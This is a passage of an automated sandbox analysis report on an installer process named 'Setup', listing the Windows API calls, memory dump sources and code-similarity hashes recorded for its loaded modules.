• GetLastError.KERNEL32(?,?,69A736C7,?,00000001,?,?,?,?,69A7332F,?), ref: 69A7283B
  • Part of subcall function 69A71967: malloc.MSVCRT(?,69A90554), ref: 69A71979
• GetTokenInformation.KERNELBASE(?,69A7332F(TokenIntegrityLevel),00000000,00000000,00000000,?,?,69A736C7,?,00000001,?,?,?,?,69A7332F,?), ref: 69A72863
Memory Dump Source
• Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
• Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
Similarity
• API ID: InformationToken$ErrorLastmalloc
• String ID:
• API String ID: 3066823155-0
• Opcode ID: abbbfafdcacbef2d2a0f0ee19271108d31f1ab6a727dd25ac03cea3a7041ddbe
• Instruction ID: 0c4c6ef88d6d82ed59011c718d64fb66d7a9d7d95a9b46da9030eeac14dbdedc
• Opcode Fuzzy Hash: abbbfafdcacbef2d2a0f0ee19271108d31f1ab6a727dd25ac03cea3a7041ddbe
• Instruction Fuzzy Hash: 1E016239544309BEEF119E949D43FAA7BEDEB05B99F104021FD00AA150D732DE42A760
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 69D7C426
• RegQueryValueExW.KERNEL32(?,?,00000000,00000000,69DB0F4A,00000004,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 69D7C43F
• RegCloseKey.KERNEL32(?,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02602230,00000004,69DB0F4A,?), ref: 69D7C44E
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: cd2fe6747988c85191029d428c78ba9fa7a3be75c87664646174d5e8646fad6d
• Instruction ID: 98a793de663d44aeb29ac85002238d5602e2eca62b26c5cef08f442681bbf6a0
• Opcode Fuzzy Hash: cd2fe6747988c85191029d428c78ba9fa7a3be75c87664646174d5e8646fad6d
• Instruction Fuzzy Hash: 7CF0EC76100148FFEF11CFA8CD86EAE7B6DEF053A9F108125F91196294D771DE509B21
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D77CEF
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D77EE4: __EH_prolog3.LIBCMT ref: 69D77EEB
  • Part of subcall function 69D75DD0: __EH_prolog3.LIBCMT ref: 69D75DD7
  • Part of subcall function 69D75485: __EH_prolog3.LIBCMT ref: 69D7548C
  • Part of subcall function 69D75485: GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,69D77DAF,?,?,?,?,?,00000000,?,?,69D6AB18,00000008,69D77CD9), ref: 69D7549C
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$HandleModule
• String ID: Unknown
• API String ID: 1530205010-1654365787
• Opcode ID: fb0e2f912b60771ad3de33bc71f2504227eba511f2be83137ba7e0bb449fd3e2
• Instruction ID: 0df508ff334571aa5052841e3bf33776f8784e37202431fe92c2bf0e21369405
• Opcode Fuzzy Hash: fb0e2f912b60771ad3de33bc71f2504227eba511f2be83137ba7e0bb449fd3e2
• Instruction Fuzzy Hash: C4317075510705DAD724DFB4C841BAFB3A8BF05314F509E2DA17ADBAC0DB70A9088766
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D82818
  • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
  • Part of subcall function 69D81EBF: __EH_prolog3.LIBCMT ref: 69D81EC6
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$_malloc
• String ID: BlockIfGroup
• API String ID: 1683881009-1356723647
• Opcode ID: 5808e08cd3cb3716319003159b0d9d00f8bd2217e48e357daed3a37768e5653e
                                                                                                                                                                    • Instruction ID: b4a4d65ff97ba99e9faedf7b0e821c81c7aa2f9de47dc8f531938b61c641440f
                                                                                                                                                                    • Opcode Fuzzy Hash: 5808e08cd3cb3716319003159b0d9d00f8bd2217e48e357daed3a37768e5653e
                                                                                                                                                                    • Instruction Fuzzy Hash: 3431427490020AEBDF00DFB8CA85B9E7BB8AF05358F108475E614EB681D734DA069B71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: %TEMP%
• API String ID: 431132790-235365282
• Opcode ID: 5f35a802de991a6b56b8cb1c84190566d75d7b43b588a91c458dfaec7fa7e445
• Instruction ID: 0ecc6d739871c6ab06df7d625d40c17ab01e9593ec57d9b36bdf6232a62ab39a
• Opcode Fuzzy Hash: 5f35a802de991a6b56b8cb1c84190566d75d7b43b588a91c458dfaec7fa7e445
• Instruction Fuzzy Hash: 45212F75900219EBDF00DF65CC889AE7B75FF58355F009919F9269B250D730DA16CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA4ADD
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
  • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$AppendPath_memcpy_s
• String ID: %TEMP%
• API String ID: 3727483831-235365282
• Opcode ID: 4e1f4e7445958a902ff9bd0045df5e7cd2627af8d1b92cfdd6fb8a51f68db793
• Instruction ID: d12807ad4ae913c307b1f03c449465a292e8e64874f1a04549686f1a8183be42
• Opcode Fuzzy Hash: 4e1f4e7445958a902ff9bd0045df5e7cd2627af8d1b92cfdd6fb8a51f68db793
• Instruction Fuzzy Hash: AF217F3690014ACFCF00DBB8C841BEEBBB8AF01328F549674D560EBBD5CB749A148762
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: %TEMP%
• API String ID: 431132790-235365282
• Opcode ID: 9f9cb2a75e113a3b702b03e87c26739846286b6654184032f9763149a8201c79
• Instruction ID: 5ddd7b4f3218a043c3afb36e9fd35e04cd2120a9ba89809a0f077d9278c00f33
• Opcode Fuzzy Hash: 9f9cb2a75e113a3b702b03e87c26739846286b6654184032f9763149a8201c79
• Instruction Fuzzy Hash: 72211A7561021AEBDB00DFA4CC49AAE7B75BF04355F408534F921AB590DB70DA15CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D8267E
  • Part of subcall function 69D789B7: __EH_prolog3.LIBCMT ref: 69D789BE
  • Part of subcall function 69D789B7: __CxxThrowException@8.LIBCMT ref: 69D78A89
  • Part of subcall function 69D82811: __EH_prolog3.LIBCMT ref: 69D82818
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8Throw
• String ID: ReturnCode
• API String ID: 2489616738-1214168914
• Opcode ID: 6b0574979b165b0194da6d128def98913b1ca5261d360f75ad54d1053ab540a3
• Instruction ID: 612c849de39b3913df9ca501546c73eb9f99b64c6167336a92f30bb4b495a81e
• Opcode Fuzzy Hash: 6b0574979b165b0194da6d128def98913b1ca5261d360f75ad54d1053ab540a3
• Instruction Fuzzy Hash: CA2138B5900215EFCB00CFA8C881A9E7BA8BF49718B148569F824DF786CB70D910CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCommandLineW.KERNEL32(F0D05EFD,69DA831D,?,00000000,69DE4C14,000000FF,?,69DA7793,?,00000000), ref: 69DB92BF
  • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
  • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$CommandLine
• String ID: repair
• API String ID: 1384747822-2397320225
• Opcode ID: c4275949c844008ac7cf8fb88470ca89e17d755b02322b0e261d98cbeae6e71d
• Instruction ID: 3eed3551869c41fb9118c4a3a26e153e166dcb5af2f434d02f20df6e70a562a4
• Opcode Fuzzy Hash: c4275949c844008ac7cf8fb88470ca89e17d755b02322b0e261d98cbeae6e71d
• Instruction Fuzzy Hash: AD11C876548740EBD710CB54CC41F9AB3DCFB59728F004A3AF9629BAD4DB30D5048791
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowPlacement.USER32(?,?), ref: 698DFF6A
  • Part of subcall function 698F76EE: _calloc.LIBCMT ref: 698F770F
  • Part of subcall function 698F83FD: __CxxThrowException@8.LIBCMT ref: 698F83E2
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Exception@8PlacementThrowWindow_calloc
• String ID: ,
• API String ID: 1982324250-3772416878
                                                                                                                                                                    • Opcode ID: e5c2c307a6692ba9425d331c22e28365a63a4261021384fd4afced91bd12f242
                                                                                                                                                                    • Instruction ID: 8df68dc781cccdeca38f57378b485d66692a063e16c64ea0b188cb943bea61d2
                                                                                                                                                                    • Opcode Fuzzy Hash: e5c2c307a6692ba9425d331c22e28365a63a4261021384fd4afced91bd12f242
                                                                                                                                                                    • Instruction Fuzzy Hash: AD113076A10209EFDB00DFA9D98099EF7F5FF49314B61882EE859E7200D730B955DBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D94689
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: #(loc.
• API String ID: 431132790-1630946291
• Opcode ID: 73aee22a72c408c4176d4378134b7f48f311022a2528566b919247532e08d3a6
• Instruction ID: e747e06acf555ba749f4ecbba980e80e6af877d5bdabc42603be3089edf0e66c
• Opcode Fuzzy Hash: 73aee22a72c408c4176d4378134b7f48f311022a2528566b919247532e08d3a6
• Instruction Fuzzy Hash: 2011BA79900249DFCF00DFA8C845AEDB7B4BF14328F508665F920AB794C774DA558BA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D897D5
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: RetryHelper
• API String ID: 431132790-1997034708
• Opcode ID: 4de32f99b96f695e01688270a1708ea7be127cfa93342da0e040571f578eacc8
• Instruction ID: cd9116182ce1df1c11bafd031cf52ddbe21b3bc8541531482b721349a8bf7408
• Opcode Fuzzy Hash: 4de32f99b96f695e01688270a1708ea7be127cfa93342da0e040571f578eacc8
• Instruction Fuzzy Hash: 11F017B5900759DFCB10DFA8C900AAEBBB4BF14214B00C839E4A9D7B41D3309A14CB61
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: Entering Function
• API String ID: 431132790-2002471330
• Opcode ID: e6dfdd40f1a6041f5ab7be2e313a84c6f7010d67a63186299efbafb93badbc43
• Instruction ID: 782a7ea141319b675492248683bec71c0cde41ff492f773c2dd19b38922f1715
• Opcode Fuzzy Hash: e6dfdd40f1a6041f5ab7be2e313a84c6f7010d67a63186299efbafb93badbc43
• Instruction Fuzzy Hash: 95F03279600201DFCB10DF68C940B9DBBE0EF54614F50C829E885CBB10CB34E854CB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
• exiting function/method, xrefs: 69D738EF
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: exiting function/method
• API String ID: 431132790-2452647166
• Opcode ID: 5478fb1c8b91c789d8f8a649f0eb3a2b814df35bc6d9d488d5b6e3c2504664dc
• Instruction ID: 6f9c20ee4c4f1e18ab9596feba8c2b4cc91837de1a7e2fab613dde94821a031a
• Opcode Fuzzy Hash: 5478fb1c8b91c789d8f8a649f0eb3a2b814df35bc6d9d488d5b6e3c2504664dc
• Instruction Fuzzy Hash: 76E0C239240601DFC700DFA8C158F09B7A1FF58315F50C468E6569BBA0CB31E814CBA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D74419
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D73C8F: __EH_prolog3.LIBCMT ref: 69D73C96
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: ParameterFolder
• API String ID: 431132790-2570462325
• Opcode ID: 82487e3e1fc5a35647e37b0a9cd0fcae4700b3d3f116a4986dcad9461e5b76a9
• Instruction ID: c1e9756015988908f1e4e69bc385b83aec9158ec97eb2f2c64de065f16cb2a75
• Opcode Fuzzy Hash: 82487e3e1fc5a35647e37b0a9cd0fcae4700b3d3f116a4986dcad9461e5b76a9
• Instruction Fuzzy Hash: 49E01AB9900119ABDF10EBA4CC00BBDB775BF10318F50D624E5206AA90C734AA289B64
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(RICHED20.DLL,?,698ECA98,00000000,00000001,?,80070057,698D5D9C,?,00000030,80070057), ref: 698E09C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: LibraryLoad
• String ID: RICHED20.DLL
• API String ID: 1029625771-992299850
Uniqueness
Uniqueness Score: -1.00%

APIs
• ctype.LIBCPMT ref: 69A82015
• ctype.LIBCPMT ref: 69A8202A
  • Part of subcall function 69A717EB: malloc.MSVCRT ref: 69A717F6
  • Part of subcall function 69A72885: InitializeCriticalSectionAndSpinCount.KERNEL32(00000004,00000FA0,?,00000000,00000000), ref: 69A728C4
  • Part of subcall function 69A73992: EnterCriticalSection.KERNEL32(?,00000000,69A7397F,00000000,69A7371E,80004005), ref: 69A739AE
  • Part of subcall function 69A72C9B: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,69A727B0,00000000,69A90088), ref: 69A72D01
  • Part of subcall function 69A72C9B: VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,69A727B0,00000000,69A90088), ref: 69A72D4F
Memory Dump Source
• Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
Similarity
• API ID: AllocCriticalSectionVirtualctype$CountEnterInitializeSpinmalloc
• String ID:
• API String ID: 738331480-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D73C96
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
• _wcspbrk.LIBCMT ref: 69D73DF7
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$_wcspbrk
• String ID:
• API String ID: 1958752295-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 69DC847A: RegCloseKey.ADVAPI32(?,?,?,69D8463B,00000034,00000034,00000000), ref: 69DC84BA
• RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,69D842F8,69D6A794,02602230), ref: 69D8468D
• RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,69D842F8,69D6A794,02602230), ref: 69D8469E
  • Part of subcall function 69DC83D2: RegQueryValueExW.ADVAPI32(00000000,00000034,00000000,00000034,00000034,00000000,?,?,69D84685,?,?,69D842F8,00000034,00000034,00000034,00000034), ref: 69DC83F4
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Close$QueryValue
• String ID:
• API String ID: 2393043351-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3_catch_free
• String ID:
• API String ID: 2207867443-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA3B32
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DA4513: __CxxThrowException@8.LIBCMT ref: 69DA45A2
  • Part of subcall function 69D78168: GetFileSize.KERNEL32(?,?,?,?,?,69DA3B9F,?,?,00000000,?,?,?,?,00000008,69DAEC79,?), ref: 69D78178
• InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,69DAEC79,?,?), ref: 69DA3BC9
  • Part of subcall function 69D780F7: WriteFile.KERNEL32(?,?,?,?,00000000,?,69DA60F1), ref: 69D7810D
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: FileH_prolog3$CriticalException@8InitializeSectionSizeThrowWrite
• String ID:
• API String ID: 593797809-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DB131C
  • Part of subcall function 69DB36BA: GetUserDefaultUILanguage.KERNEL32(02602230,?,00000000,?,?,?,?,69DB1338,?,00000010,69D85A14,?,?,?,0000004C,69DBB498), ref: 69DB36D8
• _free.LIBCMT ref: 69DB137B
  • Part of subcall function 69DB374B: __EH_prolog3.LIBCMT ref: 69DB3752
